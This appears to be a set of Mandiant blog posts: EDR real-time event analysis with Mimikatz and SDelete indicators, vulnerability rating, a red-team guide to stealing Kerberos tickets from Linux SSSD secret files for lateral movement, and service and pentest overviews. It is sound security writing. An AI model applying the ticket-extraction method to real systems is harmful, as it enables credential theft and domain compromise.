Static analysis of a large, obfuscated sample can take dozens of hours. Dynamic analysis can provide an alternate solution, but it requires the analyst to predict and simulate a proper execution environment. In this case we were able to combine our basic analysis fundamentals with a virtualized Windows domain to get the job done. We leveraged the diverse skills available to FireEye by combining FLARE reverse engineering expertise with Mandiant consulting and Red Team experience. This combination reduced analysis time to several hours. We supported an active incident response investigation by quickly extracting the necessary indicators from the compromised host. We hope that sharing this experience can assist others in building their own environment for lateral movement analysis.

Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts specifically designed for detection and incident response, implemented through Enterprise Detection and Response (EDR) solutions or enhanced logging implementations like Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events to be useful in filling in the gaps of what an attacker did. These events record different types of system activities such as process execution, file write activity, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:40:58.235

Sequence Number

2879512

PID

9392

Process Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Parent PID

9103

Parent Process Path

C:\Windows\System32\cmd.exe

EventType

Start

ProcessCmdLine

"C:\Windows\Temp\legitservice.exe"  -b -m

Process MD5 Hash

a823bc31395539816e8e4664e884550f

Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is for the last modified time of the file, not the process start time.

Field

Example

File Last
Modified (UTC)

2020-03-07 23:48:09

File Path

C:\Windows\Temp\legitservice.exe

Executed Flag

TRUE

Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to determine the process start time and this artifact includes the SHA1 hash of the file.

Field

Example

Registry Key
Last Modified (UTC)

2020-03-10 16:40:58

File Path

C:\Windows\Temp\legitservice.exe

File Sha1 Hash

2b2e04ab822ef34969b7d04642bae47385be425c

Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event. Note this artifact includes the PID in hexadecimal notation, details about the parent process, and even a field for where the process command line arguments should be. In this example the command line arguments are not present because they are disabled by default and Mandiant rarely sees this policy enabled by clients on investigations.

Field

Example

Write Time (UTC)

2020-03-10 16:40:58

Log

Security

Source

Microsoft Windows security

EID

4688

Message

A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:    

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternal’s SDelete, it is unlikely the analyst will recover the original contents of the file. Our solution’s real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the files written and partial contents of the file. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:42:59.956

Sequence Number

2884312

PID

9392

Process Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Device Path

\Device\HarddiskVolume2

File Path

C:\Windows\Temp\WindowsServiceNT.log

File MD5 Hash

30a82a8a864b6407baf9955822ded8f9

Num Bytes Seen Written

8

Size

658

Writes

4

Event reason

File closed

Closed

TRUE

Base64 Encoded
Data At Lowest Offset

Q3JlYXRpbmcgJ1dpbmRvd3NTZXJ2aWNlTlQubG9nJy
Bsb2dmaWxlIDogT0sNCm1pbWlrYXR6KGNvbW1hbmQ

Text At Lowest Offset

Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output which Mandiant has observed commonly starts with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491 followed by several file write events for this process summarized in Table 6.

Timestamp

File Path

File Size

2020-03-10 16:53:42.351

C:\Windows\Temp\WindowsServiceNT.log

638

2020-03-10 16:53:42.351

C:\Windows\Temp\AAAAAAAAAAAAAAAA.AAA

638

2020-03-10 16:53:42.351

C:\Windows\Temp\BBBBBBBBBBBBBBBB.BBB

638

2020-03-10 16:53:42.351

C:\Windows\Temp\CCCCCCCCCCCCCCCC.CCC

638

 

 

2020-03-10 16:53:42.382

C:\Windows\Temp\XXXXXXXXXXXXXXXX.XXX

638

2020-03-10 16:53:42.382

C:\Windows\Temp\YYYYYYYYYYYYYYYY.YYY

638

2020-03-10 16:53:42.382

C:\Windows\Temp\ZZZZZZZZZZZZZZZZ.ZZZ

638

Table 6: Example timeline of SDelete File write events

Admittedly, this activity may seem strange at a first glance. If we do some research on the its file hash, we’ll see the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times in a successive alphabetic manner.

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:46:51.690

Sequence Number

2895588

PID

9392

Process + Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Local IP Address

10.0.0.52

Local Port

57472

Remote IP Address

10.0.0.51

Remote Port

443

Protocol

TCP

Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to 10.0.0.51:443.

Registry Key Events

By using historical evidence to investigate relevant timeframes and commonly abused registry keys, we can identify malicious or leveraged keys. Real-time registry key events are useful for linking processes to the modified registry keys. They can also show when an attacker deletes or renames a registry key. This is useful to an analyst because the only available timestamp recorded in the registry is the last modified time of a registry key, and this timestamp is updated if a parent key is updated.

Table 8 provides an example of a real-time registry key event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:46:56.409

Sequence Number

2898196

PID

9392

Process + Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Event Type

3

Path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LegitWindowsService\ImagePath

Key Path

CurrentControlSet\Services\LegitWindowsService

Original Path

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LegitWindowsService

Value Name

ImagePath

Value Type

REG_EXPAND_SZ

Base64 Encoded
Value

QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABsAG
UAZwBpAHQAcwBlAHIAdgBpAGMAZQAuAGUAeABlAAAAAA==

Text

C:\Windows\Temp\legitservice.exe

Table 8: Example real-time registry key event

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value

Operation

1

PreSetValueKey

2

PreDeleteValueKey

3

PostCreateKey, PostCreateKeyEx, PreCreateKeyEx

4

PreDeleteKey

5

PreRenameKey

Table 9: FireEye Endpoint Security real-time registry key event types

Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.

Conclusion

The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest “branded” vulnerability on the news, it’s hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.


Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).


Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities


Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an in indication of what is occurring in the wild.


Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.


Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

Impact Type

Impact Consideration

Exploitation Consequence

The result of successful exploitation, such as privilege escalation or remote code execution

Confidentiality Impact

The extent to which exploitation can compromise the confidentiality of data on the impacted system

Integrity Impact

The extent to which exploitation allows attackers to alter information in impacted systems

Availability Impact

The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

Mitigating Factor

Mitigating Consideration

Exploitation Vector

What methods can be used to exploit the vulnerability?

Attacking Ease

How difficult is the exploit to use in practice?

Exploit Reliability

How consistently can the exploit execute and perform the intended malicious activity?

Access Vector

What type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability?

Access Complexity

How difficult is it to gain access needed for the vulnerability?

Authentication Requirements

Does the exploitation require authentication and, if so, what type of authentication?

Vulnerable Product Ubiquity

How commonly is the vulnerable product used in enterprise environments?

Product's Targeting Value

How attractive is the vulnerable software product or device to threat actors to target?

Vulnerable Configurations

Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.

Vulnerability

Vulnerability Description

NVD Rating

Mandiant Rating

Explanation

CVE-2019-12650

A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges

High

Low

This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges – level 15 admin privileges – to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this activity.

CVE-2019-5786

A use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. 

 

Medium

High

NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome.

As demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the required privileges needed to execute the vulnerability as well as the lack of observed exploitation. On the other hand, we rated the CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability pushed it to users through Chrome’s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect that the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Kerberos Tickets on Linux Red Teams

At FireEye Mandiant, we conduct numerous red team engagements within Windows Active Directory environments. Consequently, we frequently encounter Linux systems integrated within Active Directory environments. Compromising an individual domain-joined Linux system can provide useful data on its own, but the best value is obtaining data, such as Kerberos tickets, that will facilitate lateral movement techniques. By passing these Kerberos Tickets from a Linux system, it is possible to move laterally from a compromised Linux system to the rest of the Active Directory domain.

There are several ways to configure a Linux system to store Kerberos tickets. In this blog post, we will introduce Kerberos and cover some of the various storage solutions. We will also introduce a new tool that extracts Kerberos tickets from domain-joined systems that utilize the System Security Services Daemon Kerberos Cache Manager (SSSD KCM).

What is Kerberos

Kerberos is a standardized authentication protocol that was originally created by MIT in the 1980s. The protocol has evolved over time. Today, Kerberos Version 5 is implemented by numerous products, including Microsoft Active Directory. Kerberos was originally designed to mutually authenticate identities over an unsecured communication line.

The Microsoft implementation of Kerberos is used in Active Directory environments to securely authenticate users to various services, such as the domain (LDAP), database servers (MSSQL) and file shares (SMB/CIFS). While other authentication protocols exist within Active Directory, Kerberos is one of the most popular methods. Technical documentation on how Microsoft implemented Kerberos Protocol Extensions within Active Directory can be found in the MS-KILE standards published on MSDN. 

Short Example of Kerberos Authentication in Active Directory

To illustrate how Kerberos works, we have selected a common scenario where a user John Smith with the account ACMENET.CORP\sa_jsmith wishes to authenticate to a Windows SMB (CIFS) file share in the Acme Corporation domain, hosted on the server SQLSERVER.ACMENET.CORP.

There are two main types of Kerberos tickets used in Active Directory: Ticket Granting Ticket (TGT) and service tickets. Service tickets are obtained from the Ticket Granting Service (TGS). The TGT is used to authenticate the identity of a particular entity in Active Directory, such as a user account. Service tickets are used to authenticate a user to a specific service hosted on a system. A valid TGT can be used to request service tickets from the Key Distribution Center (KDC). In Active Directory environments, the KDC is hosted on a Domain Controller.

The diagram in Figure 1 shows the authentication flow.

Figure 1: Example Kerberos authentication flow

In summary:

  1. The user requests a Ticket Granting Ticket (TGT) from the Domain Controller.
  2. Once granted, the user passes the TGT back to the Domain Controller and requests a service ticket for cifs/SQLSERVER.ACMENET.CORP.
  3. After the Domain Controller validates the request, a service ticket is issued that will authenticate the user to the CIFS (SMB) service on SQLSERVER.ACMENET.CORP.
  4. The user receives the service ticket from the Domain Controller and initiates an SMB negotiation with SQLSERVER.ACMENET.CORP. During the authentication process, the user provides a Kerberos blob inside an “AP-REQ” structure that includes the service ticket previously obtained.
  5. The server validates the service ticket and authenticates the user.
  6. If the server determines that the user has permissions to access the share, the user can begin making SMB queries.

For an in-depth example of how Kerberos authentication works, scroll down to view the appendix at the bottom of this article.

Kerberos On Linux Domain-Joined Systems

When a Linux system is joined to an Active Directory domain, it also needs to use Kerberos tickets to access services on the Windows Active Directory domain. Linux uses a different Kerberos implementation. Instead of Windows formatted tickets (commonly referred to as the KIRBI format), Linux uses MIT format Kerberos Credential Caches (CCACHE files). 

When a user on a Linux system wants to access a remote service with Kerberos, such as a file share, the same procedure is used to request the TGT and corresponding service ticket. In older, more traditional implementations, Linux systems often stored credential cache files in the /tmp directory. Although the files are locked down and not world-readable, a malicious user with root access to the Linux system could trivially obtain a copy of the Kerberos tickets and reuse them.

On modern versions of Red Hat Enterprise Linux and derivative distributions, the System Security Services Daemon (SSSD) is used to manage Kerberos tickets on domain-joined systems. SSSD implements its own form of Kerberos Cache Manager (KCM) and encrypts tickets within a database on the system. When a user needs access to a TGT or service ticket, the ticket is retrieved from the database, decrypted, and then passed to the remote service (for more on SSSD, check out this great research from Portcullis Labs).

By default, SSSD maintains a copy of the database at the path /var/lib/sss/secrets/secrets.ldb. The corresponding key is stored as a hidden file at the path /var/lib/sss/secrets/.secrets.mkey. By default, the key is only readable if you have root permissions.

If a user is able to extract both of these files, it is possible to decrypt the files offline and obtain valid Kerberos tickets. We have published a new tool called SSSDKCMExtractor that will decrypt relevant secrets in the SSSD database and pull out  the credential cache Kerberos blob. This blob can be converted into a usable Kerberos CCache file that can be passed to other tools, such as Mimikatz, Impacket, and smbclient. CCache files can be converted into Windows format using tools such as Kekeo.

We leave it as an exercise to the reader to convert the decrypted Kerberos blob into a usable credential cache file for pass-the-cache and pass-the-ticket operations.

Using SSSDKCMExtractor is simple. An example SSSD KCM database and key are shown in Figure 2.


Figure 2: SSSD KCM files

Invoking SSSDKCMExtractor with the --database and --key parameters will parse the database and decrypt the secrets as shown in Figure 3.


Figure 3: Extracting Kerberos data

After manipulating the data retrieved, it is possible to use the CCACHE in smbclient as shown in Figure 4. In this example, a domain administrator ticket was obtained and used to access the domain controller’s C$ share.


Figure 4: Compromising domain controller with extracted tickets

The Python script and instructions can be found on the FireEye Github.

Conclusion

By obtaining privileged access to a domain-joined Linux system, it is often possible to scrape Kerberos tickets useful for lateral movement. Although it is still common to find these tickets in the /tmp directory, it is now possible to also scrape these tickets from modern Linux systems that utilize the SSSD KCM.

With the right Kerberos tickets, it is possible to move laterally to the rest of the Active Directory domain. If a privileged user authenticates to a compromised Linux system (such as a Domain Admin) and leaves a ticket behind, it would be possible to steal that user's ticket and obtain privileged rights in the Active Directory domain.

Appendix: Detailed Example of Kerberos Authentication in Active Directory

To illustrate how Kerberos works, we have selected a common scenario where a user John Smith with the account ACMENET.CORP\sa_jsmith wishes to authenticate to a Windows SMB (CIFS) file share in the Acme Corporation domain, hosted on the server SQLSERVER.ACMENET.CORP.

There are two main types of Kerberos ticket types used in Active Directory: Ticket Granting Ticket (TGT) and service tickets. Service tickets are obtained from the Ticket Granting Service (TGS). The TGT is used to authenticate the identity of a particular entity in Active Directory, such as a user account. Service tickets are used to authenticate a user to a specific service hosted on a domain- joined system. A valid TGT can be used to request service tickets from the Key Distribution Center (KDC). In Active Directory environments, the KDC is hosted on a Domain Controller.

When the user wants to authenticate to the remote file share, Windows first checks if a valid TGT is present in memory on the user's workstation. If a TGT isn't present, a new TGT is requested from the Domain Controller in the form of an AS-REQ request. To prevent password cracking attacks (AS-REP Roasting), by default, Kerberos Preauthentication is performed first. Windows creates a timestamp and encrypts the timestamp with the user's Kerberos key (Note: User Kerberos keys vary based on encryption type. In the case of RC4 encryption, the user's RC4 Kerberos key is directly derived from the user's account password. In the case of AES encryption, the user's Kerberos key is derived from the user's password and a salt based on the username and domain name). The domain controller receives the request and decrypts the timestamp by looking up the user's Kerberos key. An example AS-REQ packet is shown in Figure 5.

Figure 5: AS-REQ

Once preauthentication is successful, the Domain Controller issues an AS-REP response packet that contains various metadata fields, the TGT itself, and an "Authenticator". The data within the TGT itself is considered sensitive. If a user could freely modify the content within the TGT, they could impersonate any user in the domain as performed in the Golden Ticket attack. To prevent this from easily occurring, the TGT is encrypted with the long term Kerberos key stored on the Domain Controller. This key is derived from the password of the krbtgt account in Active Directory.

To prevent users from impersonating another user with a stolen TGT blob, Active Directory’s Kerberos implementation uses session keys that are used for mutual authentication between the user, domain, and service. When the TGT is requested, the Domain Controller generates a session key and places it in two places: the TGT itself (which is encrypted with the krbtgt key and unreadable by the end user), and in a separate structure called the Authenticator. The Domain Controller encrypts the Authenticator with the user's personal Kerberos key.

When Windows receives the AS-REP packet back from the domain controller, it caches the TGT ticket data itself into memory. It also decrypts the Authenticator with the user's Kerberos key and obtains a copy of the session key generated by the Domain Controller. Windows stores this session key in memory for future use. At this point, the user's system has a valid TGT that it can use to request service tickets from the domain controller. An example AS-REP packet is shown in Figure 6.

Figure 6: AS-REP

After obtaining a valid TGT for the user, Windows requests a service ticket for the file share service hosted on the remote system SQLSERVER.ACMENET.CORP. The request is made using the service's Service Principal Name (“SPN”). In this case, the SPN would be cifs/SQLSERVER.ACMENET.CORP. Windows builds the service ticket request in a TGS-REQ packet. Within the TGS-REQ packet, Windows places a copy of the TGT previously obtained from the Domain Controller. This time, the Authenticator is encrypted with the TGT session key previously obtained from the domain controller. An example TGS-REQ packet is shown in Figure 7.

Figure 7: TGS-REQ

Once the Domain Controller receives the TGS-REQ packet, it extracts the TGT from the request and decrypts it with the krbtgt Kerberos key. The Domain Controller verifies that the TGT is valid and extracts the session key field from the TGT. The Domain Controller then attempts to decrypt the Authenticator in the TGS-REQ packet with the session key. Once decrypted, the Domain Controller examines the Authenticator and verifies the contents. If this operation succeeds, the user is considered authenticated by the Domain Controller and the requested service ticket is created.

The Domain Controller generates the service ticket requested for cifs/SQLSERVER.ACMENET.CORP. The data within the service ticket is also considered sensitive. If a user could manipulate the service ticket data, they could impersonate any user on the domain to the service as performed in the Silver Ticket attack. To prevent this from easily happening, the Domain Controller encrypts the service ticket with the Kerberos key of the computer the user is authenticating to. All domain-joined computers in Active Directory possess a randomly generated computer account credential that both the computer and Domain Controller are aware of. The Domain Controller also generates a second session key specific to the service ticket and places a copy in both the encrypted service ticket and a new Authenticator structure. This Authenticator is encrypted with the first session key (the TGT session key). The service ticket, Authenticator, and metadata are bundled in a TGS-REP packet and forwarded back to the user. An example TGS-REP packet is shown in Figure 8.

Figure 8: TGS-REP

Once Windows receives the TGS-REP for cifs/SQLSERVER.ACMENET.CORP, Windows extracts the service ticket from the packet and caches it into memory. It also decrypts the Authenticator with the TGT specific session key to obtain the new service specific session key. Using both pieces of information, it is now possible for the user to authenticate to the remote file share. Windows negotiates a SMB connection with SQLSERVER.ACMENET.CORP. It places a Kerberos blob in an "ap-req" structure. This Kerberos blob includes the service ticket received from the domain controller, a new Authenticator structure, and metadata. The new Authenticator is encrypted with the service specific session key that was previously obtained from the Domain Controller. The authentication process is shown in Figure 9.

Figure 9: Authenticating to SMB (AP-REQ)

Once the file share server receives the authentication request, it first extracts and decrypts the service ticket from the Kerberos authentication blob and verifies the data within. It also extracts the service specific session key from the service ticket and attempts to decrypt the Authenticator with it. If this operation succeeds, the user is considered to be authenticated to the service. The server will acknowledge the successful authentication by sending one final Authenticator back to the user, encrypted with the service specific session key. This action completes the mutual authentication process. The response (contained within an “ap-rep” structure) is shown in Figure 10.

Figure 10: Final Authenticator (Mutual Authentication, AP-REP)

A diagram of the authentication flow is shown in Figure 11.

Figure 11: Example Kerberos authentication flow

New Tactics. New Motives. New Services.

Every day at Mandiant we respond to some of the largest cyber security incidents around the world. This gives us a front-row seat to witness what works (and what doesn't) when it comes to finding attackers and preventing them from stealing our clients' data.

Attackers' tactics and motives are evolving and as a result our security strategies also need to adapt. Today, we announced two new service offerings that will further help our clients improve their protective, detective, and responsive security controls and leverage Mandiant's extensive experience responding to some of the most serious cyber security incidents.

Our first new service offering addresses attackers' expanding motives. We are starting to see attackers with destructive motives and what could be more damaging than attacking a nation's critical infrastructure. Security incidents at critical infrastructure such as electric power grids, utilities and manufacturing companies can affect the lives of hundreds of thousands of people. Our new Industrial Control Systems (ICS) Security Gap Assessment is specifically focused on helping these industries - and others that use SCADA systems - to assess their existing security processes for industrial control systems. The service helps identify security GAPs and provides specific recommendations to close those GAPs and safeguard critical infrastructure.

Our second new service offering is designed to help organizations address the challenges they face as they build out their own internal security operations program and incident response teams. Many organizations want to enhance their internal capabilities beyond the traditional security operations centers (SOCs). Our new Cyber Defense Center Development service helps organizations evolve their internal SOC by improving the visibility (monitoring and detection) and response capabilities (incident response) necessary to defend against advanced threats. This service looks at existing people, process, and technologies and identifies areas for improvement. It helps companies to identify and prioritize the alerts that require the most immediate action with the goal to reduce the mean time to remediation.

If either of these new services sound like something that could help your organization let us know.

The Five W’s of Penetration Testing

Often in discussions with customers and potential customers, questions arise about our penetration testing services, as well as penetration testing in general. In this post, we want to walk through Mandiant's take on the five W's of penetration testing, in hopes of helping those of you who many have some of these same questions. For clarity, we are going to walk through these W's in a non-traditional order.

Why

First and foremost, it's important to be upfront with yourself with why you are having a penetration test performed (or at least considering one). If your organization's primary motivation is compliance and needing to "check the box," then be on the lookout for your people attempting to subtly (or not so subtly) hinder the test in order to earn an "easy pass" by minimizing the number of findings (and therefore the amount of potential remediation work required). Individuals could attempt to hinder a penetration test by placing undue restrictions on the scope of systems assessed, the types of tools that can be used, or the timing of the test.

Even if compliance is a motivating factor, we hope you're able to take advantage of the opportunity penetration testing provides to determine where vulnerabilities lie and make your systems more secure. That is the real value that penetration testing can provide.

Finally, if you are getting a penetration test to comply with requirements imposed on your organization, that will often drive some of the answers to later questions about the type and scope of the test. Keep in mind that standards only dictate minimum requirements, however, so you should also consider additional penetration testing activities beyond the "bare minimum."

Who

There are really two "who" questions to consider, but for now we will just deal with the first: Who are the attackers that concern you? Are they:

  1. Random individuals on the Internet?
  2. Specific threat actors, such as state-sponsored attackers, organized criminals, or hacktivist groups?
